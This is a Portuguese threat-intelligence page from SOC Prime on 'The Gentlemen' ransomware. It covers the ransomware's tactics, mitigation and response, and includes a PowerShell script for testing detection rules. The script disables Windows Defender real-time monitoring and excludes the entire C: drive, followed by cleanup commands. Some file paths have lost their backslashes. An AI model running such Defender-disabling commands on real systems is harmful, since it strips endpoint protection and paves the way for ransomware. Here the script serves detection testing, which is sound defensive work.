SOC Prime Bias: Alto

21 Nov 2025 16:30 UTC

Licença para Criptografar: Quando ‘Os Cavalheiros’ Entram em Ofensiva

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Licença para Criptografar: Quando ‘Os Cavalheiros’ Entram em Ofensiva
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O coletivo de ransomware The Gentlemen surgiu em julho de 2025, operando uma estratégia de dupla extorsão que cifrava dados das vítimas e extraía informações sensíveis. O malware é multiplataforma, visando ambientes Windows, Linux e ESXi, e inclui capacidades de reinício automático, persistência no boot e regulação configurável da criptografia. A propagação depende de WMI, PowerShell remoting, SCHTASKS e outras ferramentas administrativas internas do Windows. Os operadores gerem o The Gentlemen como uma oferta RaaS, proporcionando aos afiliados opções extensivas de ajuste e personalização.

Análise do Ataque do Ransomware The Gentlemen

A análise da Cybereason de um amostra Windows de 64 bits em Golang documentou seus switches de linha de comando, texto da nota de resgate incorporado e um amplo conjunto de rotinas anti-forenses em PowerShell. Os pesquisadores também localizaram locais de registro usados para persistência, uma ‘lista de mortes’ de serviços destinada a desativar processos críticos, e dependência de binários nativos do Windows para escalonamento de privilégios e movimento lateral. O pipeline de criptografia é construído sobre XChaCha20 e Curve25519.

Mitigação

Medidas defensivas sugeridas incluem a aplicação da autenticação multifator, manutenção de backups offline frequentes, aplicação imediata de patches de segurança e restrição dos controles de execução do PowerShell e WMI. As pilhas de proteção de endpoints devem habilitar salvaguardas anti-malware em tempo real, anti-ransomware e proteção para cópias de sombra VSS. As equipes de segurança também devem monitorar modificações anômalas no registro, novas tarefas agendadas e padrões característicos de comandos PowerShell.

Resposta

Quando a atividade do ransomware The Gentlemen é identificada, isole imediatamente o sistema afetado, capture a memória volátil e colete artefatos chave, como entradas de registro, tarefas agendadas e logs de eventos do PowerShell. Realize a aquisição forense de notas de resgate e arquivos criptografados, depois restaure sistemas afetados a partir de backups confiáveis uma vez que a erradicação seja verificada. Envolva equipes de resposta a incidentes para investigar caminhos de movimento lateral e evidências de exfiltração de dados.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Primeiro Verificador de Telemetria e Linha de Base deve ter passado.

Justificativa: Esta seção detalha a execução precisa da técnica adversária (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

  • Narrativa do Ataque & Comandos:

    1. Objetivo: Desativar a proteção em tempo real do Windows Defender e adicionar um caminho de exclusão para permitir que o ransomware escreva arquivos criptografados sem impedimentos.
    2. Método: Use um PowerShell Invoke‑Command com um bloco de script embutido que executa os dois comandos de preferência do Defender. Isso espelha a sintaxe exata observada em amostras do ransomware “The Gentlemen”.
    3. Passos:
      • Abra uma sessão PowerShell com privilégios elevados.
      • Execute o Invoke‑Command que contém o bloco de script malicioso.
      • Verifique se o monitoramento em tempo real do Defender está desativado e se a exclusão para C: foi adicionada.
      • (Opcional) Crie um arquivo criptografado fictício para emular a atividade de ransomware.
  • Script de Teste de Regressão: O seguinte script PowerShell autônomo reproduz o ataque exatamente como a regra espera.

    # ------------------------------------------------------------------
    # Test script to trigger Sigma rule "Detect PowerShell Commands Used by
    # 'The Gentlemen' Ransomware"
    # ------------------------------------------------------------------
    # Ensure script runs as Administrator
    if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator))
    {
        Write-Error "Run this script with elevated (Administrator) privileges."
        exit 1
    }
    
    # 1️⃣ Disable real‑time monitoring
    Invoke-Command -ScriptBlock {
        Set-MpPreference -DisableRealtimeMonitoring $true
    }
    
    # 2️⃣ Add exclusion for the C: drive
    Invoke-Command -ScriptBlock {
        Add-MpPreference -ExclusionPath 'C:'
    }
    
    # 3️⃣ (Optional) Simulate ransomware file creation
    $dummyPath = "C:RansomTestencrypted.txt"
    New-Item -ItemType Directory -Path (Split-Path $dummyPath) -Force | Out-Null
    "This is a mock encrypted payload." | Set-Content -Path $dummyPath -Encoding UTF8
    
    Write-Host "Simulation completed. Defender should now be disabled and exclusion added."
  • Comandos de Limpeza: Restaure o Defender ao seu estado padrão e remova artefatos de teste.

    # ------------------------------------------------------------------
    # Cleanup script – re‑enable Defender and delete test files
    # ------------------------------------------------------------------
    # Re‑enable real‑time monitoring
    Invoke-Command -ScriptBlock {
        Set-MpPreference -DisableRealtimeMonitoring $false
    }
    
    # Remove the C: exclusion
    Invoke-Command -ScriptBlock {
        Remove-MpPreference -ExclusionPath 'C:'
    }
    
    # Delete dummy encrypted file and folder
    $dummyPath = "C:RansomTestencrypted.txt"
    if (Test-Path $dummyPath) { Remove-Item $dummyPath -Force }
    $folder = Split-Path $dummyPath
    if (Test-Path $folder) { Remove-Item $folder -Recurse -Force }
    
    Write-Host "Cleanup completed. Defender settings restored."